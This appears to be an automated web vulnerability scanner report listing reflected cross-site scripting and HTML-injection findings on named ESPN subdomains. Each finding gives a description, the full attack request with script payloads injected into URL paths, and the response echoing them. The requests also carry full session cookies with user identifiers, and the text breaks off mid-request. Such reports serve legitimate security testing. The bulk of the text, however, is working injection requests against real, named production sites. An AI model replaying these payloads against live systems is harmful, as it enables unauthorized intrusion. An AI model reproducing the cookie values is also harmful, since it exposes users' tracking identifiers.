HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:33:55 GMT Content-Length: 82242 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>United States Footb ...[SNIP]... <a href="/worldcup2010/team?team=660&3e57e"><a>f7a6114e7ef=1&_slug_=united-states&3e57e"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70663"><a>50054d97128 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia70663"><a>50054d97128 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:19 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:19 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:33:19 GMT Content-Length: 81915 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Serbia Football / S ...[SNIP]... <a href="/worldcup2010/team?team=6757&_slug_=serbia70663"><a>50054d97128&topId=797998&linktext=Serbia+coach+Radomir+Antic+wants+to+stay"> ...[SNIP]...
2.112. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/6757/serbia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ccb"><a>dea0025a04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia?82ccb"><a>dea0025a04=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:06 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:06 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN19 Cache-Expires: Sat, 06 Nov 2010 23:31:06 GMT Content-Length: 82015 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Serbia Football / S ...[SNIP]... <a href="/worldcup2010/team?team=6757&82ccb"><a>dea0025a04=1&_slug_=serbia&82ccb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cab3f<script>alert(1)</script>2f1f80457b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /keyword/searchcab3f<script>alert(1)</script>2f1f80457b3 HTTP/1.1 Host: sports.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289019231610; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; AcceptCookies=yes; CRBLM=CBLM-001:; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 136 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/keyword/searchcab3f<script>alert(1)</script>2f1f80457b3</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ceec<script>alert(1)</script>05c8d5071b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /createOrUpdateEntry2ceec<script>alert(1)</script>05c8d5071b9 HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 144 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/createOrUpdateEntry2ceec<script>alert(1)</script>05c8d5071b9</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 101c7<script>alert(1)</script>0c34eaeab34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en101c7<script>alert(1)</script>0c34eaeab34/ HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 128
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en101c7<script>alert(1)</script>0c34eaeab34/</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ebfd3<script>alert(1)</script>d621151af8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enebfd3<script>alert(1)</script>d621151af8a/conversation HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 140
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enebfd3<script>alert(1)</script>d621151af8a/conversation</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c6338<script>alert(1)</script>735d75941d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/conversationc6338<script>alert(1)</script>735d75941d4 HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 137
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/conversationc6338<script>alert(1)</script>735d75941d4</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71549<script>alert(1)</script>907b7ff7526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en71549<script>alert(1)</script>907b7ff7526/createOrUpdateEntry HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 147
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en71549<script>alert(1)</script>907b7ff7526/createOrUpdateEntry</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a058b<script>alert(1)</script>6b3ce37571f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/createOrUpdateEntrya058b<script>alert(1)</script>6b3ce37571f HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 144
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/createOrUpdateEntrya058b<script>alert(1)</script>6b3ce37571f</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67f2a<script>alert(1)</script>2fd0abe5ee5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en67f2a<script>alert(1)</script>2fd0abe5ee5/entry HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; 